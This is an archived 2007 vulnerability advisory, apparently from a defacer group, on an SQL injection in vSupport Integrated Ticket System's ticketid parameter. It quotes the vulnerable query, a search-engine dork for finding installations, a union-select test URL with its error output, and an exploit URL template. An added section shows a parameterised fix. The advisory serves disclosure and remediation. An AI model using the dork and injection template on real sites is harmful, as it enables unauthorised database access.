Computer Security
[EN] securityvulns.ru

From:stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date:11.06.2007
Subject:vSupport Integrated Ticket System 3.*.* SQL injection

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Vendor ............: http://www.cmgsccc.com
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
               // do not limit the users access
               $fromuseraccess = "";
       }

       // get the info about the ticket first
       if ($ticket = $db->query_first("
               SELECT ticket.*
               " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
               FROM " . TABLE_PREFIX . "ticket as ticket
               " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
               WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
               $fromuseraccess
       "))
       {


+--------------------------------------------------------------------
+  An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+  output:
+--------------------------------------------------------------------

MySQL Error  : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064


Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     :
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

               SELECT ticket.*
               ,icon.title AS icontitle, icon.iconpath
               FROM ticket as ticket
               LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
               WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+  Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------
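
The query quoted in the advisory places `$vbulletin->GPC['ticketid']` directly into the SQL text. The following is an added example, not vSupport or vBulletin code and not part of the advisory: the same kind of lookup with the ID validated as an integer and bound as a parameter. The PDO/SQLite setup, the `title` column and the function names are assumptions made for the demonstration.

```php
<?php
// Added example; not vSupport or vBulletin code. Function, table and column
// names below are assumptions made for the demonstration.

// Accept only a plain decimal ticket ID; everything else is rejected.
function parse_ticket_id($raw): ?int
{
    if (!is_string($raw) || $raw === '' || strlen($raw) > 9 || !ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Look up a ticket with the ID bound as an integer parameter, so the value
// never becomes part of the SQL text.
function find_ticket(PDO $db, $rawId): ?array
{
    $id = parse_ticket_id($rawId);
    if ($id === null) {
        return null;            // caller should answer with a 400/404
    }
    $stmt = $db->prepare('SELECT ticketid, title FROM ticket WHERE ticketid = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed test data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ticket (ticketid INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO ticket VALUES (1, 'Printer offline')");

// Constructed inputs: a valid ID, the advisory's test string, and two
// other non-numeric values.
foreach (['1', '1/**/union/**/select/**/', '1abc', '-1'] as $input) {
    $ticket = find_ticket($db, $input);
    printf("%-28s => %s\n", $input, $ticket ? $ticket['title'] : 'no ticket');
}
```

Only the input `1` returns a row; the advisory's test string fails validation and never reaches the database, so no SQL error text is produced for the client to see.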
